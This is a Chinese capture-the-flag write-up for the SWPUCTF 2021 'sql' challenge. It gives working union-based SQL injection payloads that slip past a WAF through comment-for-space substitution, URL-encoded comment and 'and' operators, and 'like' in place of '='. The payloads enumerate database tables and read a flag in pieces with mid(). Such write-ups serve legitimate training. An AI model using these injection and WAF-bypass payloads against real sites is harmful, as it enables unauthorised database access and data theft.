[SWPUCTF 2021 新生赛]sql
[SWPUCTF 2021 新生赛]sql wp
输入 1 正常回显:
?wllm=1
返回:
Want Me? Cross the Waf
Your Login name:xxx
Your Password:yyy
输入单引号引发报错:
?wllm=1'
返回:
Want Me? Cross the Waf
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
group by
测试回显行数:
1' group by 3#
触发了 waf :
可能是过滤了空格,也可能是 group by
关键字,还可能是注释符。一个一个测:
输入: ?wllm=1 1
,触发 waf ,说明空格被过滤,使用 /**/
替换空格: ?wllm=1/**/1
,成功回显。
除此之外常被用来替换空格的还有:
%20
%09
%0A(%0a)
%0C(%0c)
%0D(%0d)
%0B(%ob)
%A0(%a0)
输入:?wllm=group/**/by
,正常回显,说明该关键字没有被过滤。
使用 /**/
替换空格,再次用 group by
测试列数:
输入:
?wllm=1'/**/group/**/by/**/2#
引发报错:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1
说明 # 被过滤,尝试其他注释符:--
,--+
,%23(#的URL编码)。最后只有 %23 可以用:
?wllm=1'/**/group/**/by/**/2%23
经过测试,共有 3 列。
select 查询回显位
由于开头的 1 会干扰回显,所以这里去掉1(或者换成负数也行):
?wllm='/**/union/**/select/**/1,2,3%23
经过测试,回显位为后两位。
select 查询数据库
?wllm='/**/union/**/select/**/1,2,database()%23
数据库名称为:test_db
select 查询表名:
?wllm='/**/union/**/select/**/1,2,table_name/**/from/**/information_schema.tables/**/where/**/table_schema=test_db%23
但是触发了 waf ,一开始我以为是 information_schema
被过滤了,经过测试,是等号被过滤了。
用 like 关键字可以替换等号,比如:table_schema=ctf
可以写成 table_schema like 'ctf'
。
用 like 替换等号查询表名:
?wllm='/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
成功回显,LTLT_flag 就是要找的表名。
select 查询列名:
?wllm='/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'/**/and/**/table_name/**/like/**/'LTLT_flag'%23
但是被 waf 了,猜测是 and 出问题了。尝试了大小写,&&
替换 and 都不行,最后用 %26%26
成功绕过。
%26
就是 &
的 URL 编码。
用 %26%26 替换 and 查询列名:
?wllm='/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'/**/%26%26/**/table_name/**/like/**/'LTLT_flag'%23
成功回显:
select 查询 flag 列的内容:
?wllm='/**/union/**/select/**/1,2,flag/**/from/**/LTLT_flag%23
出来了但没完全出来:
这里看了下大佬的 wp ,substr,substring 都被过滤了,说用 mid 函数分段读取。
mid 函数分段读取 flag :
读取第一段:
?wllm='/**/union/**/select/**/1,2,mid(flag,1,20)/**/from/**/LTLT_flag%23
读取第二段:
?wllm='/**/union/**/select/**/1,2,mid(flag,21,40)/**/from/**/LTLT_flag%23
读取第三段:
?wllm='/**/union/**/select/**/1,2,mid(flag,41,60)/**/from/**/LTLT_flag%23
经过拼接,得到了一个完整的 flag 。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!